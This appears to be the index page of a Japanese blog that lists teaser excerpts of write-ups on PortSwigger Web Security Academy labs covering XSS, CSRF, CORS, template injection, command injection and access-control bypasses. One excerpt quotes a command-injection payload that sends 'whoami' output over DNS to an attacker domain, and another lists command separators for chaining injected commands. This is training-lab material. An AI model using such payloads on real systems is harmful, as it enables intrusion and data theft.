Shikata Ga Nai

Private? There is no such things.

PortSwigger

Clickjacking with a frame buster scriptをやってみた

Hello there, ('ω')ノ フレームバスタースクリプトを使用したクリックジャッキングを。 このラボは、Webサイトがフレーム化されるのを防ぐ。 フレームバスターによって保護されていて。 フレームバスターを回避するクリックジャッキング攻撃でメールアドレス…

Basic password reset poisoningをやってみた

Hello there, ('ω')ノ 基本的なパスワードリセットポイゾニングを。 このラボは、パスワードリセットポイズニングに対して脆弱で。 まずは、Forgetをクリックして。 wienerのパスワードリセットをリクエストして。 エクスプロイトサーバで、Emailをクリック…

Basic server-side template injection (code context)をやってみた

Hello there, ('ω')ノ 基本的なサーバサイドのテンプレートインジェクション(コードコンテキスト)を。 このラボは 、Tornadoテンプレートを安全に使用していないので脆弱のようで。 まずは、ログインから。 コメントを投稿して、結果を確認して。 どうやら…

Basic server-side template injectionをやってみた

Hello there, ('ω')ノ 基本的なサーバサイドのテンプレートインジェクションを。 このラボは、サーバサイドのテンプレートインジェクションに脆弱で。 ERBテンプレートの構築が安全でないのが原因で。 まずは、製品の詳細を表示しようとすると。 GET リクエ…

CSRF where Referer validation depends on header being presentをやってみた

Hello there, ('ω')ノ リファラーの検証が存在するヘッダーに依存するCSRFを。 このラボのメール変更機能はCSRFに対して脆弱で。 クロスドメインリクエストをブロックしようとするものの。 安全でないフォールバックがあって。 ラボを解決するには、CSRF攻撃…

CSRF where token is tied to non-session cookieをやってみた

Hello there, ('ω')ノ トークンが非セッションCookieに関連付けられているCSRFを。 このラボのメール変更機能はCSRFに対して脆弱で。 トークンはサイトのセッション処理システムに完全には統合されていなとのこと。 CSRF攻撃で、電子メールアドレスを変更せ…

CSRF where token is duplicated in cookieをやってみた

Hello there, ('ω')ノ トークンがCookieに複製されるCSRFを。 このラボのメール変更機能はCSRFに対して脆弱で。 エクスプロイトサーバでCSRF攻撃をして電子メールアドレスを変更せよと。 まずは、動作確認を。 リクエストボディにcsrfは見当たらず。 ログイ…

Reflected XSS into HTML context with all tags blocked except custom onesをやってみた

Hello there, ('ω')ノ カスタムタグを除くタグがブロックされた状態でXSSをHTMLコンテキストに反映を。 このラボでは、カスタムタグを除くすべてのHTMLタグをブロックして。 ラボを解決するにはカスタムタグを挿入してXSS攻撃を実行せよとのことで。 まずは…

Exploiting XSS to perform CSRFをやってみた

Hello there, ('ω')ノ XSSを活用してCSRFを実行を。 このラボではブログのコメント機能に脆弱性があって。 脆弱性を悪用してCSRF攻撃 で、ブログ投稿のコメントを表示する人の。 電子メールアドレスを変更せよと。 まずは、ログインして。 アカウントページ…

Exploiting cross-site scripting to capture passwordsをやってみた

Hello there, ('ω')ノ クロスサイトスクリプティングを活用してパスワードを取得を。 このラボでは、ブログのコメント機能に脆弱性があって。 この脆弱性を悪用して被害者のユーザ名とパスワードを盗んで。 被害者のアカウントにログインするとのことで。 ま…

Exploiting cross-site scripting to steal cookiesをやってみた

Hello there, ('ω')ノ クロスサイトスクリプティングを利用してCookieを盗むを。 このラボは、ブログのコメント機能に脆弱性があって。 被害者は、すべてのコメントを表示する際に脆弱性が悪用されて。 被害者のセッションCookieを盗み出して、それを使用し…

Reflected XSS protected by CSP, with CSP bypassをやってみた

Hello there, ('ω')ノ CSPバイパスを使用してCSPで保護された反射型XSSを。 このラボでは、CSPを使用しているとのことで。 コンテンツセキュリティポリシー (CSP) は。 クロスサイトスクリプティング (XSS) などの攻撃を検知して。 影響を軽減するために追加…

Reflected XSS in a JavaScript URL with some characters blockedをやってみた

Hello there, ('ω')ノ 一部の文字がブロックされたJavaScriptURLに反映されたXSSを。 このラボでは、入力内容をJavaScript URLに反映していて。 ただ、アプリケーションはXSS攻撃を防ぐために一部の文字をブロックしていると。 ラボを解決するには、アラート…

Reflected XSS in canonical link tagをやってみた

Hello there, ('ω')ノ 正規リンクタグに反映されたXSSを。 このラボは、ユーザ入力を正規リンクタグに反映して山括弧をエスケープするらしく。 ラボを解決するには、XSS攻撃を呼び出す必要があって。 XSSを呼び出すために下記のキーを押すとのことで。 ただ…

CORS vulnerability with trusted insecure protocolsをやってみた

Hello there, ('ω')ノ 信頼できる安全でないプロトコルによるCORSの脆弱性を。 サイトには、プロトコルに関係なくすべてのサブドメインを信頼するという点で。 安全でないCORS構成があるようで。 まずは、ログインしてアカウントページにアクセスして。 履歴…

CORS vulnerability with trusted null originをやってみた

Hello there, ('ω')ノ 信頼できるヌルオリジンによるCORSの脆弱性を。 「null」オリジンを信頼するという点で安全でないCORS構成があって。 まずは、ログインして、マイアカウントをクリックして。 該当するリクエストは、/accountDetailsへのAJAXリクエスト…

CORS vulnerability with basic origin reflectionをやってみた

Hello there, ('ω')ノ 基本的なオリジンリフレクションを伴うCORSの脆弱性を。 Origin リクエストヘッダは、どこがフェッチの原点であるかを示して。 パス情報は含まれず、サーバ名のみが含まれて。 Referer ヘッダとは、パス全体が公開されるわけではない点…

DOM-based cookie manipulationをやってみた

Hello there, ('ω')ノ DOMベースのCookie操作を。 このラボでは、DOMベースのクライアント側のCookie操作について説明して。 ラボを解決するには、別のページにXSSを発生させるCookieを挿入して。 まずは、Last viewed productメニューを表示させてクリック…

DOM XSS using web messages and a JavaScript URLをやってみた

Hello there, ('ω')ノ WebメッセージとJavaScriptURLを使用したDOMXSSを。 このラボでは、Webメッセージングでトリガーされる。 DOMベースのリダイレクトの脆弱性があって。 まずは、サイトにアクセスしてみると。 下記のようなJavascriptが確認できて。 ど…

DOM XSS using web messagesをやってみた

Hello there, ('ω')ノ Webメッセージを使用するDOMXSSを。 WebメッセージをリッスンするaddEventListenerが確認できて。 「addEventListener()」は、JavaScriptからさまざまなイベント処理を実行できて。 まずは、下記にアクセスして。 https://aca01f2c1ee4…

Blind OS command injection with out-of-band data exfiltrationをやってみた

Hello there, ('ω')ノ 帯域外チャネルは、挿入されたコマンドから出力を抽出する簡単な方法を提供して。 whoamiで、コマンドの結果を含む攻撃者のドメインでDNS lookupが発生して。 例えば、下記のように。 & nslookup `whoami`.kgji2ohoyw.web-attacker.com…

Blind OS command injection with out-of-band interactionをやってみた

Hello there, ('ω')ノ 帯域外の相互作用を伴うブラインドOSコマンドインジェクションを。 文字列はコマンドセパレータとして機能して。 コマンドをチェーン化できて。 下記のコマンドセパレータは、WindowsとUnixベースの両方で機能して。 &&&||| まずは、下…

Host header authentication bypassをやってみた

Hello there, ('ω')ノ リクエストが送信されるサーバのHostヘッダ認証バイパスを。 リクエストをリピータへ。 Hostヘッダを変更してSendしても、正常にレスポンスが返ってきて。 robots.txtのレスポンスは以下のとおりで。 https://acdb1f811fffc1ad80e26504…

URL normalizationをやってみた

Hello there, ('ω')ノ ブラウザのURLエンコードが原因で直接悪用できないXSSの脆弱性が含まれていて。 ラボを解決するには、キャッシュの正規化プロセスを利用するとのことで。 まずは、サイトにアクセスして。 正常にキャッシュできていないようで。 X-Cach…

User ID controlled by request parameter with password disclosureをやってみた

Hello there, ('ω')ノ パスワード開示を伴うリクエストパラメータによって制御されるユーザーIDを。 マスクされたパスワードがあって。 ラボを解決するには、管理者のパスワードを取得するとのこと。 まずは、ログインして。 マスクされているパスワードはレ…

User ID controlled by request parameter with data leakage in redirectをやってみた

Hello there, ('ω')ノ リダイレクトでデータ漏洩を伴うリクエストパラメータで制御されるユーザIDを。 リダイレクトのレスポンスに機密情報が漏洩する脆弱性が 。 まずは、ログインして。 My accountをクリックするとID関連のパラメータは見つからず。 ただ…

User ID controlled by request parameter, with unpredictable user IDsをやってみた

Hello there, ('ω')ノ リクエストパラメータによって制御されるユーザID、予測できないユーザIDを。 ラボには、ユーザーアカウントページに水平方向の特権昇格の脆弱性があるとか。 まずは、carlosのブログ投稿を探して。 carlosをクリックすると。 リクエス…

User ID controlled by request parameterをやってみた

Hello there, ('ω')ノ リクエストパラメータによって制御されるユーザIDを。 ユーザアカウントページに水平方向の特権昇格の脆弱性があるらしく。 まずは、ログインして。 Keyが表示されて。 各リクエスト内容を確認してもアカウントを識別するパラメータは…

URL-based access control can be circumventedをやってみた

Hello there, ('ω')ノ URLベースのアクセス制御の回避を。 このWebサイトには、/adminに認証されていない管理パネルがあって。 フロントエンドシステムは、そのパスへの外部アクセスをブロックするとか。 まずは、下記へアクセスして確認してみると。 https:…

User role can be modified in user profileをやってみた

Hello there, ('ω')ノ ユーザロールはユーザプロファイルで変更を。 このラボには、/adminに管理パネルがあって。 ログインしているユーザのみがアクセスできると。 roleid 2の管理パネルにアクセスして。 まずは、/adminにアクセスしてみるとブロックされて…